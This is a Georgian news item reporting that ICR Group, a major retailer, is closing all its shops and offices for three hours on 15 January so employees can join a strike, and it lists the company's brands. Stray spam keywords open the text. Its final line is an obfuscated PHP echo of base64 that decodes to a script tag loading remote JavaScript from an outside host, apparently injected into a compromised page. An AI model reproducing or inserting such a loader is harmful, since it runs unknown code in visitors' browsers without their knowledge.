celsiusi
ავერსი jaluzi

ICR ჯგუფი 15 იანვრის გაფიცვის ფარგლებში ყველა ობიექტს და ოფისს ხურავს - ამის შესახებ კომპანიის მიერ Facebook-გვერდზე გამოქვეყნებულ განცხადებაშია ნათქვამი.

"ვიღებთ გადაწყვეტილებას 15 იანვარს 15 საათიდან 3 საათის განმავლობაში დავხუროთ კომპანიის ყველა ობიექტი და ოფისი, რათა აი სი არ ჯგუფის ყველა თანამშრომელისათვის შევქმნათ ადამიანის ერთ-ერთი ძირითადი უფლების - გამოხატვის თავისუფლების საკუთარი შეხედულებისამებრ განხორციელების წინაპირობა", - ნათქვამია ICR ჯგუფის განცხადებაში.

ცნობისთვის, ICR ჯგუფი ერთ-ერთი ყველაზე დიდი ორგანიზაციაა საცალო ბიზნესის სფეროში საქართველოში. კომპანიამ 1993 წელს დაიწყო საქმიანობა ქართულ ბაზარზე და ამჟამად 1500-ზე მეტ თანამშრომელი ჰყავს. "აი სი არ ჯგუფი" ამჟამად ქართულ ბაზარზე ფეხსაცმლის, ტანსაცმლის, აქსესუარების ისეთ საერთაშორისო 21 საერთაშორისო და ადგილობრივ ბრენდს წარმოადგენს, როგორიცაა: „ბატა“, „ჯეოქსი“, „კორსო იტალია“, „სტუდიო ფეხსაცმლის გალერია“, „ოკაიდი“, "პეპე ჯინსი", "რიფლეი" და ა.შ.

სტუმარმასპინძლობის სექტორში "აი სი არ ჯგუფი" კვების ობიექტებს "ტაბლა სალონს", "პომოდორისიმოს", "პანუცო", ასევე ღვინის მაღაზია "ღვინერეას", პრივატული სივრცე გასტრონომიული ექსპერიმენტებისა და კულინარიის მოყვარულთათვის „ფუდ ლაბს“ და "აი სი არ ქეითერინგს" აერთიანებს.

51
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");